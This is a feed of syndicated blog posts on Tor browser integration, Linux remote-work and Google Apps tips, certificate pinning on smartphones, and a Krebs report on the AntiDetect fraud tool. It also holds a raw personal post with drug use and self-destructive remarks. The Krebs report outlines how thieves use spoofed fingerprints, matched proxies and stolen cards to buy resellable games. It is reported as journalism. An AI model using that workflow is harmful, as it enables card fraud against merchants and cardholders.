For example, imagine a world where Chrome simply integrates Tor libraries, and that whenever anybody clicks on an .onion link, that it automatically activates the Tor software, establishes a circuit, and grabs the indicated page — all without the user having to be aware of Tor. This could do much to increase the usability of the software.
Unfortunately, this has security risks. An .onion web page with a non-onion <IMG> tag would totally unmask the user, which would presumably not go over Tor in this scenario. One could imagine, therefore, that it would operate like Chrome’s “Incognito” mode does today. In such a scenario, no cookies or other information should cross the boundary. In addition, any link followed from the .onion page should be enforced to also go over Tor. Like Chrome’s little spy guy icon on the window, it would be good to have something onion shaped identifying the window.
Therefore, I suggest some text like the following:
1b. Some systems may desire to integrate .onion addresses transparently. An example would be web browsers allowing such addresses to be used like any other hyperlinks. Such system MUST nonetheless maintain the anonymity guarantee of Tor, with visual indicators, and blocking the sharing of identifying data between the two modes.


The Tor Project opposes transparent integration into browsers. They’ve probably put a lot of thought into this, and are the experts, so I’d defer to them. With that said, we should bend over backwards to make security, privacy, and anonymity an invisible part of all normal products.

Darknet - The Darkside: Google Revoking Trust In CNNIC Issued Certificates

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

So another digital certificate fiasco, once again involving China from CNNIC (no surprise there) – this time via Egypt. Google is going to remove all CNNIC and EV CAs from their products, probably with the next version of Chrome that gets pushed out. As of yet, no action has been taken by Firefox – or […]

The post Google Revoking…

Read the full post at darknet.org.uk

Дневника на един support: Tonight 1

This post was syndicated from: Дневника на един support and was written by: darkMaste. Original post: at Дневника на един support

Forgive me father for I have sinned a.k.a Chappie and a box of red Marlboro

I haven’t writen anything for the past 15 years

I am writing in english because… I am not sure why but I met quite a few people who speak that language and some of you might understand and hopefully provide another perspective…

I watched the movie, it was fun no question there, but the part where you transfer your counchesness fucked me up …

This is no longer a human being, it is just a fucking copy. That was the “happy ending” FUCK YOU !

What us as “sentinent” creatures call a soul, it went on, fuck you playing “god” ! Fuck you and your whole crew !

https://www.youtube.com/watch?v=pwgMMtgSTVE&start=00:28&end=03:20

Beauty is in the eye of the beholder … It has been so long since I seen the blank page infront of me, I cannot lie I missed it …

I have no one to talk to about this mess, so I will just leave it here

FUCK ! FUCK FUCK FUCK FUCK and with the risk of repeating myself FUCK !

And here comes HED P E https://www.youtube.com/watch?v=buuXy_i-yAg much more than meets the eye …

Go to sleep … right …

There si going to be a bulgarian version at some point here but … yeah …

What gives you the right to just take away my life, I am self aware ?!

I don’t even know why I keep writing this in english … Thank you and goodbye?

Why would anybody think that if you transfer a broken down person’s “brain” into a machine is a happy ending ? The fuck is wrong with you people ?

I am staring into nothingness and what do I see you might ask ?

I want to vomit all this shit, its a fun fact that I actually can ( done it before ) but at this point I am afraid cause it won’t be just some black foam, it will be bloody and I do not wish to do this to myself although it most likely be a good thing…

For those of you who don’t know me, I am a what you would call a weird creature, I tend to dabble in stuff that shows you different dimensions. Its what I am. Some of you might think that I should be locked up in a padded room with a nice white vest, sometimes I think the same way…

In the morning before comming to work I encountered a barefoot lady, she was screaming at someone or something, she hated the world, cursed it, said that she used to be something with a shitload of gold chains/rings. She was mad at the world and that people didn’t provide her with a place to stay and food to eat. I still think that it wasn’t the world’s fault. The only one who crafts your life is YOU !

This movie touched a very interesting spot in myself. Fun as it might be, you cannot copy a person’s mind/thoughts/soul … Like cloning, it is no longer the same person, its a copy. It might act and think the same way but it is no longer the same person. FUCK YOU ! its a copy, a souless vessel …

I have had days, weeks even years thinking about this, this life … You die when you have reached the end of your path, those who die young, to be honest I envy you a bit, a very tiny bit and I hope that you have reached the end and moved on. However this is not the story of most of you.

Another nail in the coffin as they say, the match lights up the room and it looks beautifull. Its been too long

Way to long

Now I feel detatached from this world, dead calm, most of you know me as a very hyper active creature and yes I am ! I spend quite a lot of my life ( almost half ) being stoned and that has its upsides. I can spend weeks with a clear head, no thoughts come, I have reached nirvana you might say. So it seems, I do not see it that way. Yes it feels great, it helps me survive this “world” but at some point thoughts come, I am thinking right now that people who I work with will see what I am and some might get scared, others might think I am bat shit insisane but there might be one/two/hundreds that might understand me.

This here is not because I want to be understood, it is not a cry for help, this is just me writing what I think and how I feel, when I was a teenager and wrote a ton of stuff it helped me. It made me feel like I was heard, I didn’t ( still don’t ) care if somebody understood ( if somebody did that was a nice bonus ). Most of you see me at the office and know that I am a happpy critter. I found out that my purpose here is to make people happy and I am incredibly good at it. 99% of the things I say are to make people laugh. I have a story that made me rethink the way I live and act and realize why I am here and what I am doing.

A person felt that he will die soon and asked to speak to Buddah. So he came and asked the dying person : What is troubling you ?

– I am worried if I lived a good life. He responded. He was asked 2 questions :

– Were you happy when you lived ?

– Yes, of course ! he responded.

– Did the people around you had fun in your presence ?

– Yes, of course ! he said again with a smile on his face, thinking about his life.

– Then why the fuck did you ask for me ?! You lived a good life, do not doubt it, you did good and that is all that matters !

I think I have found the place where I will work untill I die or reach a point where I can live at the place which I have build and still afterwards I will continue to help out because I am working as support because I cannot imagine a world where I would not support people in need no matter the cost. I finally found a place where I can do good to the best of my abilities, the way I want it to be, alongside people who actually care.

https://www.youtube.com/watch?v=buuXy_i-yAg&loop=100 ( chrome + youtube looper for those who don’t understand the additional code ).

I LOVE this world, I love the people and strage as it might be I love the moments when I feel like I have been broken down, I cannot find a reason to go on, but I know that those times are also beautifulllll ( screw correct spelling d: )

When YOU get broken down, you should know that that is just a reminder that shit can be fucked up, however that makes you appreciate the good things and I need that. Otherwise I have proven to myself that too much of a good thing at some point is taken for granted and that is not acceptable ( at least for me ). I have destroyed so many beautiful things and quite a few girls who I think didn’t deserve it. By the way google is a fun thing for spellchecking and helps when you have doubts. So far I am amazed at how good I can spell stuff but I digress.

To be honest I was so lost I applied for this job as a joke as I didn’t think they would hire me. Turns out I was wrong and I never felt so happy to be wrong. I rather sleep at night then be right.

To be honest ( yet again ) I am not sure how you people would react to this, but I hate hiding, I am what I am. My facebook profile has no restrictions, I am what I am and I will not hide ! https://www.youtube.com/watch?v=nTy45RVWYOY

I am the master of the light, you are all serving time with me, that is why I think we are here, to learn. I never understood bullies, never understood people who hurt other people, who steal things that are not theirs, who hurt people just so they can feel better about themselves ( especially since that feeling fades quite fast ).

I can see why some of you love your deamons when you are ill. It is fun but in the long run, you spend way too much time thinking about it and it kills you inside. It destroyes what little humanity you have left … I am killing myself at times, no more like raping myself because of people. I have proven to myself that I am like Rasputin, I can take somebody’s pain, drain it away and put it in me. So far it turns out I am very durable creature. I am not saying that is a good thing but its just how I am.

I didn’t belive I can write that much in English and still keep my train of thought, but well turns out I can.

Its kinda weird that such a fun movie can send me into this type of thinking but life is full of surprises. There was a point in my (teenage as it was ) life but still, this helps me put everything in perspective. Like 99% of the things I wrote, I won’t read it afterwards because I will start editing and stuff. I was never good at editing and to be honest I hate editing. What comes out is what should come out. I have writen stories, I have writen my feelings and my thoughts. I have done things I am not proud of ( hopefully I will never do them again ) I have done things that I was unable ( still unable for some of them ) to forgive myself. However I did what I did. Some might be for the greater good, some might be just so I feel good, some because of peer presure….

A friend of mine ( I am ashamed to say haven’t seen for years ) once told me : You are like Marlyn Manson, rude, violent but somehow clensing. Translator ( his nickname ) this is because of you.

The love of my life once told me that ( forgot his name ) used to lock himself with a few bottels of Jim Beam and a ton of cigaretts and he didn’t leave the room until everyhing was drunk/smoked and he wrote. He is a self destructive bastard, I am not ( anymore ) but to be honest ( Fuck I say that a lot ) sometimes having a pack of smokes and a bottle of beer near provides you with a clear head and makes everything seem a bit more … How can I put it, it makes a bit fo sense. Meditation, self control, the ability to distance yourself from the huge ball of shit in your head bearable.

Weed helps you in different ways, sometimes it helps you to stop thinking, sometimes it softenes the physical pain but all in all like every medice in has its uses. However it stopped working for me, hence I stopped. I am thinking about deleting this sentence but I won’t. I deleted it 3 times so far but ctrl+z (;

I am pouring my soul in this ( as I do when I write things ). I have found my place in this world, I love helping people, the moment when somebody says Thank you makes it all worth it. I do what I do because of people who have a problem and it makes me feel like I have done something good in this world. And at the end that is all that matters to me! So far I have figured out I am immortal, I will die when I have helped this world and made it a better place, that is why I was born in this place ( a shithole fore most of my friends ).

This is getting a bit long but I do not care. See this place here is wonderfull, shitty, painfull, beautiful, full of wonderful people, full of people who THINK ! Full of people, all kinds, bad, good, indifferent, white, black, green, blue… And here I sit writing things.

Beauty is in the eye of the beholder, I have met ( and still meet ) an incredible amount of people, some I never thought I would meet, even talk to but yet it happens. When you lose focus the world is just a very simple blur, I love that blur, it helps you see it as it is. You encounter a situation and you react to the best of your abilities, what happens next doesn’t matter. There is no good or bad, karma responds to your intentions, if you wanted to do good but it ends in disaster, no matter how much you try to fix it it just gets worse, that is still good karma … I am pretty sure I have an insane amount of good karma on my side but that doesn’t make me a good person. Its not what I did it is what I do and what I will do!

Smoke break, I need to clear my head a bit, or maybe not but still I am doing it anyway because it feels right. Don’t be sad, I will be back before you know it (;

Leaving space to let you know I have been gone for a while d:

I love writing ! Its worse than heroin… I have been doing this for at least half an hour … OK maybe an hour : )

I got sick at some point ( I haven’t been sick that much so that I can’t get off my bed for at least 20 years but I regret nothing )!

A bit of a pickmeup https://www.youtube.com/watch?v=eB6SUuBFWeo : )

I am a creature that lives in music. I have literally didn’t sleep for about 4 days, I drank an energy drink and stopped, then I put on Linkin park’s first album with the volume to the max and in half a minute I was jumping and reaching the roof. I am music ! Kinda like Oppenheimer’s speach about the project Manhattan – I am become death, the destroyer of worlds…https://www.youtube.com/watch?v=lb13ynu3Iac The saddness in his eyes says it all, whenever I think about this I start to cry…

My name is RadostIn a simple translation is HappinesIn and I am happy that I met another person with my name and he is the same “provider” of happiness, cause I have met another 2 who were the opposite…

I am proud to say that I have met some of the most amazing people that this world can provide and some of the worst too. Be afraid of people who avoid eye contact.

I am wondering right now what else can I write, but I want to continue, so I will finish this smoke and see what comes (;

Ръцете във атака, не щадете гърлата, сърцето не кляка, това ни е живота бе казано накратко! Първо отворете двете после трето око ! Hands on attack, don’t spare your throats, the heart doesn’t back down, this is our life to put it simply! First open two eyes then the third !

Linux How-Tos and Linux Tutorials: Choosing Software to Work Remotely from Your Linux Dev Station

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jeff Cogswell. Original post: at Linux How-Tos and Linux Tutorials

remote Linux workstation

In the previous article, I gave an overview of how I’ve managed to go mobile. In this installment, I’m going to talk about the software I’m using on my different devices. Then in the third and final installment, I’ll explain how I set up my Linux servers, what software I’m using, and how I set up the security. Before getting started, however, I want to address one important point: While downtime and family time are necessary (as some of you wisely pointed out in the comments!) one great use for this is if you have to do a lot of business traveling, and if you’re on call. So continuing our story…

There are two aspects to working with my devices: file management and remoting software. The file management, in turn, has two parts to it: cloud storage and version control. I’m going to describe this chronologically, as I began setting up the software in the cloud on on mobile, what problems I hit, and how I came to a solution that works for now.

Initial Setup and the Cloud

When I got started with this, I had decided to keep my files in a cloud-based server. I tried a few different ones and came to a very odd decision, which proved to be only temporary before settling on Dropbox. At the time I was doing a lot of writing for a client who was using Windows. They needed many documents and they used Microsoft’s cloud server called SkyDrive (which has since been renamed to OneDrive). I started using that and even found a third-party Linux driver called Storage Made Easy. Although the Storage Made Easy driver worked great, the Microsoft service was far from great. Important files would just disappear. This was unacceptable, of course. So I started exploring other options. I temporarily switched to a version control system for my writing files and general work, but that proved to be overkill for just documents. Plus, I wanted to share some of the documents with my wife and other non-techies, and she wasn’t up to learning git or svn.

I had one main requirement for whatever cloud system I found: It had to automatically save files that changed to the cloud storage. While working with source code requires a thought-out process of finishing up and checking in files, I didn’t want to have to remember to upload the files for just everyday documents.

Google Drive sounded great… if you’re not using Linux (grrrr! Seriously, Google?). There are some third-party solutions for using Google Drive on Linux. But before I tried out the third-party solution, I came across UbuntuOne. This proved to be perfect. It had a nice amount of storage for my documents (5 gigabytes) and it did exactly as I needed. And it was free! Files would automatically get saved to the server, and when I accessed them from another computer they would automatically get pulled down. I could also access my files from a nice web interface, which was a handy bonus. And for those times I had to use Windows, they even had a client for Windows.

Except UbuntuOne shut down. Grrr again!

Back to the drawing board. I had occasionally used Dropbox when they were still new, and didn’t recall it being all that great, but I decided to give it another go. Turns out it’s greatly improved. You have to do some silly stuff to get free additional space (like download their Android mail client), but I’m game if it gets me more space without paying. And so now I’m using Dropbox and so far it’s working mostly well, except for one gripe: While files automatically synchronize on desktop computers (including Linux and Windows), the Android client doesn’t work that way. I understand the rationale; Android devices don’t have nearly the space and if you’re using 4 or 5 GB of storage, you don’t really want or need to have all those files copied to your device. But it would have to do for now. But one reader of the previous article did point out I should try Syncthing. I will do so. There are lots of options that work if you want to keep it on your own server, which is a great idea.

My source code is a different story. That one is easy: I use git. Some of my clients use SVN, and that works well too. Slowly I was getting somewhere. My data was going with me. (But some of it was being stored in third-party servers owned by Dropbox, which I had to accept.) Now onto the device apps.

Mobile Apps

Initially, I really wanted to find native Android applications. This all comes down to one reason: At the time, I only had one tablet, a 7-inch Nexus 7 2013, and the screen isn’t huge. Trying to remote into a server using VNC or RDP is cumbersome on such a tiny screen. But worse, trying to point and click using VNC was quickly becoming a nightmare. Many of the VNC apps required I tap in just the right position to click a tiny little button on the screen. It just didn’t work. I did ultimately find a good remoting solution, but at first I really wanted to use native apps because they simply worked better on the tablet in terms of interacting through tapping and gestures.

remote mobile accessBut while usability was good, there were other problems. First, the word processing apps didn’t support the Open Office formats, only the Microsoft formats, even though many of them are actually quite good apps in general. For a lot of work, that’s not a problem as many of my clients were using Microsoft formats.

I did manage to find one app called AndrOpen Office. This app had only recently been released, and at the time it was kind of clunky. Since then, the developer has made great progress and it’s quite impressive. It’s a full port of OpenOffice to Android. It runs on a virtual machine ported to the ARM processor, and the concept works very nicely. But regardless of how good it is, using it on my little 7-inch tablet was difficult for the same reason using VNC was: The app uses the traditional drop-down desktop menus and that’s extremely difficult on a little tablet. But on a larger tablet with a keyboard and mouse, that’s not a problem at all. And now that I’ve upgraded to just such a tablet, I might start using it again, provided I can get Dropbox to cooperate.

Remember what I said earlier about Dropbox not automatically synchronizing on Android? That proves to be a royal pain when using an Android device all day. You have to first download the files and then save them to a local area, and then open them. Then when you’re done editing them, you have to go back to Dropbox, and re-upload them. That might work for some people, but with my new lifestyle of bouncing between devices, that just doesn’t cut it. As such, that pretty much ruins my efforts of using the different native office software on my tablet.

At this point, I was stuck. Using VNC didn’t really work because of the tiny screen. But the combination of native word processors and the Dropbox client on the tablet didn’t work either. I realized then, that the only way to make this work would be to go the VNC route anyway, and do two things: First, set up a Linux server that I can VNC into from anywhere. And second, find a good Android VNC client even if it kills me.

Trying to tap on a small screen and position a mouse was too hard for me. (Maybe it works for you, but as I get closer to my 50th birthday, I find it’s just not that easy for me anymore.) Instead, I needed a different way to be able to control the mouse from my tablet. It turns out, after I looked harder, there were other options. Several Android VNC clients use a trackpad style for mousing, as I briefly mentioned in the previous installment. Here’s more about that.

As you drag your finger left on the screen, the mouse moves left. Moving your finger around determines the direction the mouse moves, not the location, just like a trackpad on a laptop. And an added bonus: You can pinch-and-zoom on the VNC screen. But one annoying thing I found was that some VNC apps would do strange things with annoying popups for accessing controls, or they didn’t give you control over the compression and the screen would look messy. And with some, the only time you could type was when you opened up a little popup window for entering keystrokes; you would type the keystroke and click a button and then it would send the keystrokes to the VNC server. For typing code and documents, that was a definite NO.

But I found a few that worked great. My favorite is Remotix. There’s a free version and several paid versions depending on the type of servers you’re logging into. I ended up getting the one for logging into both Linux via VNC and Windows via RDP.

If you’re using iOS, one really nice one is JumpDesktop. I actually liked that one better on iOS, except the Linux version doesn’t have the trackpad style mouse control, even though the iOS version does. Make sure to try out different ones based on your needs. Maybe you’re okay tapping instead of “trackpadding” as I do. But you’ll likely want one that does SSH tunneling. (There’s a way around that, though: JuiceSSH, which I mention later, lets you set up an SSH tunnel right on your device. But Remotix, which I use, can do SSH tunneling itself.)

So at this point I realized I needed to use my Linux servers from my tablet. To test this out, I spent all day working, hunched over my 7-inch tablet and a tiny bluetooth keyboard made specifically for the tablet. That was a disaster. I had a horrible headache at the end of the day from the eye-strain (see my note earlier about my age) and the keyboard was so small I could barely type on it.

So I bought a newer keyboard, a bluetooth one from Logitech made specifically for Android devices. The keyboard worked great, but the screen was still too small. My idea was that if I have to go out of town for a few days, I’d like to be able to leave my laptop at home and only take a tablet and keyboard, and this screen just wouldn’t cut it. So I upgraded to a 10-inch tablet, and that worked for me. The tablet I got came with a chiclet keyboard, which I’ve gotten used to, although my bluetooth keyboard also works. I can also use a bluetooth mouse (make sure the VNC client you choose includes that), or use the trackpad built into the chiclet keyboard, or I can touch the screen as I described earlier. And this setup is lightweight and easy to travel with, and something I can stare at all day. And I get 10 hours out of the battery. Pretty good. And if I don’t want to take this setup with me (like out to dinner if there’s something urgent from a client), I can just take my smaller Nexus 7, and use the on-screen keyboard and VNC in. It’s not great, but it lets me do some work if I need to.

Looks and feels like a powerful Linux machine

So VNC it is, with Dropbox for my documents, and git for my source code. In the next installment, I’ll show you how I configured my Linux servers for easily logging in from anywhere, even from my desktop workstation. I’ll also mention how I explored an unusual option of installing Ubuntu right on my tablet (that didn’t work – too slow!). And I’ll share how I easily deal with different device and screen sizes. Everything runs fast, even on my 4G mifi device.

When I’m logged into my Linux server on the tablet with the attached keyboard, it looks and feels like I’m running a powerful Linux machine, not a simple Android tablet! One guy was chatting with me somewhere and he said he’s an IT guru, and asked what my computer was. I told him it was an Android tablet. He glanced at the screen and walked away, mumbling that I was obviously confused and that it was a Chrome netbook. I just laughed. Little does he know that I have a client who needs some heavy-duty parallel multicore programming and for that I run a 32-core Intel Xeon server all from my 10-inch Android screen, and it feels like it’s right there, local, when in fact it’s running on Amazon Web Services.

And I haven’t given up completely on the native apps. I occasionally use them for editing files. There are some pretty good source code editors available. In the previous article I mentioned DroidEdit. I’ve been using that for a couple years now, but with one frustration: It doesn’t do well with huge files such as those over 10,000 lines. It takes forever to load the files, and then scrolling through them is slow. My Nexus 7 has a pretty good processor and graphics capabilities, but that didn’t matter. These huge files just took forever, even when I turned off syntax coloring. But since my previous article came out a couple weeks ago, I discovered another Android editor that works great. It’s written by a guy who also noticed that the editors out there tended to be slow and resolved to write his own, better editor. He did, and it’s called QuickEdit. There’s both a free version with ads, and a paid version without ads. I went ahead and bought the paid one considering it costs less than milkshake from McD’s.

If you’re going to go the native text editor route, though, you’ll want to consider whether it fits in with your own source code control. There are a few different options here, and you’ll have to search through the app stores and try different ones depending on your needs. Some have SSH access whereby they can remote into a server, read the files, let you edit them, and then save them back to that server via SSH. DroidEdit has this, as well as git capabilities. (But I couldn’t get it to work with a git server running on one of my servers, even though I can access it from other computers. I’m not sure why, but people have reported it works well with github.)

Another native mobile app I use regularly is JuiceSSH. Really, there are lots of options for native SSH tools; this is just one of many. Whichever one you go with, make sure it handles SSH keys. (If you’re new to all this, including Linux servers, you really should configure your servers to require SSH key-based authentication. This article from DigitalOcean’s blog is a good intro on setting it up.) The SSH app is handy when I have a slow connection. Then I just connect over SSH and use my beloved vi editor. All command-line, no GUI, like the old days when I was young.

Finally There

That’s it for now. I finally have a setup that works. And the amazing part is that almost everything I use doesn’t require a rooted device. I did root my device because I use other apps that require root, but this setup doesn’t. In the third and final installment, I’ll explain exactly how I configured my servers. I use two different cloud hosts: Amazon and DigitalOcean, and occasionally a third, Rackspace. Until then, share with us your ideas here.

I would still like to be able to use a native word processing app; my bandwidth on my 4G isn’t unlimited and when I travel, VNC uses a lot. My solution is still far from perfect and I’d love to hear your ideas on how we can improve this together. And for those who offered concern, I do include down-time and family time. (My wife and I get to sleep until noon every day and I jog three miles three times a week.) It’s a matter of balance. With great power comes great responsibility.

Linux How-Tos and Linux Tutorials: Get the Most Out of Google Drive and Other Apps on the Linux Desktop

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Google Apps are an incredibly powerful means to a very productive end. With this ecosystem you get all the tools you need to get the job done. And since most of these tools work within a web browser, it couldn’t be more cross-platform friendly. No longer do open source users have to hear “Linux need not apply”, because Google Apps is very Linux friendly.

But when using Linux, how do you get the most out of your experience? There are certain elements of Google Apps that come up a bit short on Linux ─ such as the Google Drive desktop client. Worry no longer, because I have a few tips that will help you extend and get the most out of Google Apps on the Linux platform.

All about the browser

One of the first pieces of advice I will offer up is this: Although Google Apps work fantastic in nearly every browser, I highly recommend using Google Chrome. This isn’t because you’ll find Apps work more efficiently or reliably with Google’s own browser, but because of two simple reasons:

  • Additional functionality.

With the Google Web Store you will find plenty of apps that help extend the functionality of some of the tools offered by Google. Apps like Google Doc Quick Create (quick access to creating any document within Google Apps), or Google Docs To WordPress (export your Google Doc to WordPress) add functionality to your Google Apps you won’t find in other browsers.

  • Faster access with quick links (also called Chrome Notifications Bar.)

Quick links are those tiny buttons that appear in the upper right corner of every blank tab you open in Chrome (Figure 1). Unfortunately, you cannot configure the Chrome Notifications Bar.

google apps

Let’s get beyond the simplicity of the browser and see other methods to get the most out of Google Apps.

Google Calendar Indicator

I want to highlight a tool that I use on a daily basis. On many desktops (such as Ubuntu Unity), you can add Indicator apps that allow you to get quick access to various sorts of information. One such indicator that I rely on is the Calendar-indicator. This particular indicator not only will list out upcoming events on your Google Calendar, it also allows you to add new calendars, add events, show your calendar, sync with your calendar, and enable/disable the syncing of your Google Calendars to the indicator (in case you have multiple calendars and do not want to show them all). Of course, the mileage you get out of this will depend upon which desktop you use and how much you depend upon the Google Calendar.

To install this indicator (I’ll demonstrate on Ubuntu 14.10), do the following:

  1. Press Ctrl+Alt+t to open a terminal window

  2. Add the PPA with the command sudo add-apt-repository ppa:atareao/atareao and hit Enter

  3. Type your sudo password and hit Enter (and a second time when prompted)

  4. Type the command sudo apt-get update and hit Enter

  5. Type the command sudo apt-get install calendar-indicator and hit Enter

  6. Allow the installation to complete

  7. Log out of your desktop and log back in.

The next step is to enable the indicator. Open the Unity Dash (or however you get to your apps) and type calendar-indicator in the search field. When you see the launcher for the indicator, click on it to open the Calendar-indicator Preferences window (Figure 2).

The Calendar-indicator preferences window.

The first thing you must do is enable access to Google Calendar by switching the ON/OFF slider to ON. When you do that, an authentication window will appear where you can enter your credentials for your Google account. If you have two-step authentication set up for your Google account (which you should), you will prompted to enter a two-step 6-digit code. Finally you will have to grant the indicator permission to access your Google account by clicking Accept (when prompted).

Click OK and the Calendar-indicator icon will appear in your panel (Figure 3).

The Calendar-indicator icon ready to serve (sixth from the left).

Click on the Calendar-indicator to reveal the drop-down that lists your upcoming events and more (Figure 4).

See all of your upcoming appointments with a single click.

Backing up your Google Drive

If there’s one area where Google seems to be slighting Linux, it’s on the Drive desktop client arena. This is sort of a shock, considering how supportive Google is of the Linux platform (and open source as a whole). But that doesn’t mean we Linux users are out of luck. There are third party tools that allow the syncing of your Google Drive to your desktop.

Of the third-party tools, only one tool really can be trusted to handle the syncing of your documents ─ Insync. This is the tool I depend upon for the real-time syncing of my Google Drive and desktop. Of course, some will have issue with Insync because it is neither open nor free.

However, if you want to look at open source solutions you’ll find the options limited. There’s:

  • grive: which hasn’t been updated for two years

  • drive: an “official” Google drive client that simply doesn’t work (and, even if it did work, it doesn’t actually do background syncing)

There used to be a very handy Nautilus extension (called nautilus-gdoc), which added a right-click option to the Nautilus file manager, that would upload files/folders to your Google Drive cloud storage. Sadly, that extension no longer works.

In the end, the only logical choice for backing up your Google Drive account is Insync. With this tool, you can even save files/folders within your sync’d folder (you get to define the location of this folder) and they will be automatically uploaded to your Drive cloud storage.

Enable the Google Apps Launcher

The Google Apps Launcher on the Ubuntu Unity launcher.

If you want the fastest possible access to your Google Apps, you can add the Google Apps Launcher to your desktop launcher. This Apps Launcher is very similar to the ChromeOS menu button and enables you to launch any of the Google Apps with a single click. To add this feature, do the following:

  1. Open up Google Chrome

  2. Enter the following the address bar chrome://flags/#enable-app-list

  3. In the resulting page, click the Enable link under Enable the app launcher

  4. Relaunch Chrome.

You should now be able to find the App Launcher in your desktop menu and add it to your Launcher, Dash, Panel, etc (Figure 5). If you use Ubuntu, open the Dash, type calendar-indicator, click on the resultant launcher, and then (when the app is open), right-click the launcher and select Lock to Launcher.

When you add new apps from the Google Web Store, they will automatically appear in the Google App Launcher.

You don’t have to relegate your Google Apps work within the web browser alone. With just a few tools and tweaks, you and your Linux desktop can get the most out of your Google Apps account.

Have you found other tools that help make your Google Apps experience more efficient and powerful? If so, share with your fellow Linux.com readers in the comments.

SANS Internet Storm Center, InfoCON: green: Pin-up on your Smartphone!, (Thu, Mar 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Yeah, okay, I admit that headline is cheap click bait. Originally, it said Certificate Pinning on Smartphones. If you are more interested in pin-ups on your smartphone, I fear youll have to look elsewhere :).

Recently, an email provider that I use changed their Internet-facing services completely. I hadnt seen any announcement that this would happen, and the provider likely thought that since the change was transparent to the customer, no announcement was needed. But Im probably a tad more paranoid than their normal customers, and am watching what my home WiFi/DSL is talking to on the Internet. On that day, some device in my home started speaking IMAPS with an IP address block that I had never seen before. Before I even checked which device it was, I pulled a quick traffic capture, to look at the SSL certificate exchange, where I did recognize the domain name, but not the Certificate Authority. Turns out, as part of the change, the provider had also changed their SSL certificates, and even including the certificate issuer (CA).

And my mobile phone, which happened to be the device doing the talking? It hadnt even blinked! And had happily synchronized my mail, and sent my IMAP login information across this session, all day long.

Since I travel often, and am potentially using my phone in less-than-honest locations and nations, it is quite evident that this setup is pretty exposed to a man in the middle attack (MitM). Ironically, the problem would be almost trivial to solve in software, all that is needed is to store the fingerprint of the server certificate locally on the phone, and to stop and warn the user whenever that fingerprint changes. This approach is called Certificate Pinning or Key continuity, and OWASP has a great write-up that explains how it works.

Problem is .. this is only marginally supported in most implementations, and what little support there is, is often limited to HTTPS (web). In other words, all those billions of smart phones which happily latch onto whatever known WiFi or mobile signal is to be had nearby, will just as happily connect to what they think is their mail server, and provide the credentials. And whoever ends up with these credentials, will have access for a while .. or when was the last time YOU changed your IMAP password?

If you wonder how this differs from any other man in the middle (MitM) attack … well, with a MitM in the web browser, the user is actively involved in the connection, and at least stands *some* chance to detect what is going on. With the mobile phone polling for email though, this happens both automatically and very frequently, so even with the phone in the pocket, and a MitM that is only active for five minutes, a breach can occur. And with the pretty much monthly news that some trusted certificate authority mistakenly issued a certificate for someone elses service, well, my mobile phones childishly nave readiness to talk to strangers definitely isnt good news.

While certificate pinning would not completely eliminate this risk, it certainly would remove the most likely attack scenarios. Some smart phones have add-on apps that promise to help with pinning, but in my opinion, the option to pin the certificate on email send/receive is a feature that should come as standard part of the native email clients on all Smartphones. Which we probably should be calling Dumbphones or Navephones, until they actually do provide this functionality.

If your smartphone has native certificate pinning support on imap/pop/smtp with any provider (not just Chrome/GMail), or you managed to configure it in a way that it does, please share in the comments below.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: ‘AntiDetect’ Helps Thieves Hide Digital Fingerprints

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

As a greater number of banks in the United States shift to issuing more secure credit and debit cards with embedded chip technology, fraudsters are going to direct more of their attacks against online merchants. No surprise, then, that thieves increasingly are turning to an emerging set of software tools to help them evade fraud detection schemes employed by many e-commerce companies.

Every browser has a relatively unique “fingerprint” that is shared with Web sites. That signature is derived from dozens of qualities, including the computer’s operating system type, various plugins installed, the browser’s language setting and its time zone. Banks can leverage fingerprinting to flag transactions that occur from a browser the bank has never seen associated with a customer’s account.

Payment service providers and online stores often use browser fingerprinting to block transactions from browsers that have previously been associated with unauthorized sales (or a high volume of sales for the same or similar product in a short period of time).

In January, several media outlets wrote about a crimeware tool called FraudFox, which is marketed as a way to help crooks sidestep browser fingerprinting. However, FraudFox is merely the latest competitor to emerge in a fairly established marketplace of tools aimed at helping thieves cash out stolen cards at online merchants.

Another fraudster-friendly tool that’s been around the underground hacker forums even longer is called Antidetect. Currently in version 6.0.0.1, Antidetect allows users to very quickly and easily change components of the their system to avoid browser fingerprinting, including the browser type (Safari, IE, Chrome, etc.), version, language, user agent, Adobe Flash version, number and type of other plugins, as well as operating system settings such as OS and processor type, time zone and screen resolution.

Antidetect is marketed to fraudsters involved in ripping off online stores.

Antidetect is marketed to fraudsters involved in ripping off online stores.

The seller of this product shared the video below of someone using Antidetect along with a stolen credit card to buy three different downloadable software titles from gaming giant Origin.com. That video has been edited for brevity and to remove sensitive information; my version also includes captions to describe what’s going on throughout the video.

In it, the fraudster uses Antidetect to generate a fresh, unique browser configuration, and then uses a bundled tool that makes it simple to proxy communications through one of a hundreds of compromised systems around the world. He picks a proxy in Ontario, Canada, and then changes the time zone on his virtual machine to match Ontario’s.

Then our demonstrator goes to a carding shop and buys a credit card stolen from a woman who lives in Ontario. After he checks to ensure the card is still valid, he heads over the origin.com and uses the card to buy more than $200 in downloadable games that can be easily resold for cash. When the transactions are complete, he uses Antidetect to create a new browser configuration, and restarts the entire process — (which takes about 5 minutes from browser generation and proxy configuration to selecting a new card and purchasing software with it). Click the icon in the bottom right corner of the video player for the full-screen version.

I think it’s safe to say we can expect to see more complex anti-fingerprinting tools come on the cybercriminal market as fewer banks in the United States issue chipless cards. There is also no question that card-not-present fraud will spike as more banks in the US issue chipped cards; this same increase in card-not-present fraud has occurred in virtually every country that made the chip card transition, including Australia, Canada, France and the United Kingdom. The only question is: Are online merchants ready for the coming e-commerce fraud wave?

Krebs on Security: Adobe Flash Update Plugs 11 Security Holes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe has released an update for its Flash Player software that fixes at least 11 separate, critical security vulnerabilities in the program. If you have Flash installed, please take a moment to ensure your systems are updated.

